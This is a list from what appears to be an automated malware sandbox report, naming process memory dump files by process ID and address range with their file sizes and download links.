memory/3588-137-0x00007FF913E00000-0x00007FF913E23000-memory.dmp

Filesize
140KB

Download
memory/3588-245-0x00007FF926FB0000-0x00007FF926FBF000-memory.dmp

Filesize
60KB

Download
memory/3588-247-0x00007FF91DD00000-0x00007FF91DD2D000-memory.dmp

Filesize
180KB

Download
memory/3588-249-0x00007FF913E00000-0x00007FF913E23000-memory.dmp

Filesize
140KB

Download
memory/3588-248-0x00007FF914C10000-0x00007FF914C29000-memory.dmp

Filesize
100KB

Download
memory/3588-146-0x00007FF913C80000-0x00007FF913DF7000-memory.dmp

Filesize
1.5MB

Download
memory/3588-256-0x00007FF911B00000-0x00007FF911B33000-memory.dmp

Filesize
204KB

Download
memory/3588-143-0x00007FF920580000-0x00007FF92058D000-memory.dmp

Filesize
52KB

Download
memory/3588-254-0x00007FF920580000-0x00007FF92058D000-memory.dmp

Filesize
52KB

Download
memory/3588-259-0x00007FF90D510000-0x00007FF90DA30000-memory.dmp

Filesize
5.1MB

Download
memory/3592-0-0x0000000000800000-0x0000000001076000-memory.dmp

Filesize
8.5MB

Download
memory/3592-1-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/3592-2-0x000000001BEB0000-0x000000001BEC0000-memory.dmp

Filesize
64KB

Download
memory/3592-118-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/3764-246-0x000001D199370000-0x000001D199380000-memory.dmp

Filesize
64KB

Download
memory/3764-834-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/3764-243-0x000001D199370000-0x000001D199380000-memory.dmp

Filesize
64KB

Download
memory/3764-244-0x000001D199370000-0x000001D199380000-memory.dmp

Filesize
64KB

Download
memory/3764-258-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/3764-264-0x000001D199370000-0x000001D199380000-memory.dmp

Filesize
64KB

Download
memory/4524-25-0x0000000000D70000-0x0000000000D88000-memory.dmp

Filesize
96KB

Download
memory/4524-27-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/4524-145-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/4660-274-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/4660-253-0x0000022F12090000-0x0000022F120A0000-memory.dmp

Filesize
64KB

Download
memory/4660-183-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/4660-205-0x0000022F12090000-0x0000022F120A0000-memory.dmp

Filesize
64KB

Download
memory/4660-177-0x0000022F12090000-0x0000022F120A0000-memory.dmp

Filesize
64KB

Download
memory/4660-176-0x0000022F12090000-0x0000022F120A0000-memory.dmp

Filesize
64KB

Download
memory/4788-270-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/4788-198-0x000001E8C8000000-0x000001E8C8010000-memory.dmp

Filesize
64KB

Download
memory/4788-262-0x000001E8C8000000-0x000001E8C8010000-memory.dmp

Filesize
64KB

Download
memory/4788-141-0x000001E8C8000000-0x000001E8C8010000-memory.dmp

Filesize
64KB

Download
memory/4788-140-0x000001E8C8000000-0x000001E8C8010000-memory.dmp

Filesize
64KB

Download
memory/4788-158-0x00007FF917C70000-0x00007FF918731000-memory.dmp

Filesize
10.8MB

Download
memory/4788-156-0x000001E8AFAA0000-0x000001E8AFAC2000-memory.dmp

Filesize
136KB

Download
memory/4980-120-0x0000000000DE0000-0x0000000001048000-memory.dmp

Filesize
2.4MB

Download
memory/4980-126-0x0000000005A00000-0x0000000005A10000-memory.dmp

Filesize
64KB

Download
memory/4980-124-0x000000000A640000-0x000000000ABE4000-memory.dmp

Filesize
5.6MB

Download
memory/4980-220-0x0000000074780000-0x0000000074F30000-memory.dmp

Filesize
7.7MB

Download
memory/4980-125-0x0000000005B10000-0x0000000005BA2000-memory.dmp

Filesize
584KB

Download
memory/4980-121-0x0000000074780000-0x0000000074F30000-memory.dmp

Filesize
7.7MB

Download
memory/4980-123-0x0000000003450000-0x0000000003456000-memory.dmp

Filesize
24KB

Download